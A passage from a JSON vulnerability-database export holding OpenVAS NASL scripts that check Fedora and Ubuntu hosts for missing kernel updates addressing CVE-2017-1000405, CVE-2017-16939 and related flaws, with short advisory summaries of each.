rpm:\"kernel~4.13.16~302.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-12-05T00:00:00", "id": "OPENVAS:1361412562310873857", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873857", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2017-9ea11e444d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_9ea11e444d_kernel_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for kernel FEDORA-2017-9ea11e444d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873857\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-05 07:54:59 +0100 (Tue, 05 Dec 2017)\");\n script_cve_id(\"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for kernel FEDORA-2017-9ea11e444d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-9ea11e444d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2ALUMLCIZOR6UUC5NJKXPGIAXHBJR6NL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.13.16~202.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843394", "type": "openvas", "title": "Ubuntu Update for linux USN-3510-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3510_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3510-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843394\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:23 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3510-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3510-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3510-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic-lpae\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-lowlatency\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500mc\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-smp\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-emb\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-smp\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843393", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843393", "type": "openvas", "title": "Ubuntu Update for linux-azure USN-3511-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3511_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-azure USN-3511-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843393\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:17 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-azure USN-3511-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-azure'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux-azure on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3511-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3511-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.11.0-1016-azure\", ver:\"4.11.0-1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.11.0.1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843397", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843397", "type": "openvas", "title": "Ubuntu Update for linux USN-3508-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3508-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843397\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:49 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3508-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Yonggang Guo discovered that a race condition existed in the\n driver subsystem in the Linux kernel. A local attacker could use this to\n possibly gain administrative privileges. (CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-1023-raspi2\", ver:\"4.10.0-1023.26\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.10.0.1023.24\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843396", "type": "openvas", "title": "Ubuntu Update for linux-hwe USN-3508-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-hwe USN-3508-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843396\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:42 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-hwe USN-3508-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-hwe'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3508-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 17.04. This update provides the corresponding updates\n for the Linux Hardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu\n 16.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Yonggang Guo discovered that a\n race condition existed in the driver subsystem in the Linux kernel. A local\n attacker could use this to possibly gain administrative privileges.\n (CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux-hwe on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46~16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-16.04\", ver:\"4.10.0.42.44\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-09T00:00:00", "id": "OPENVAS:1361412562310843400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843400", "type": "openvas", "title": "Ubuntu Update for linux-aws USN-3509-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3509-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843400\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-09 07:39:26 +0100 (Sat, 09 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3509-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n 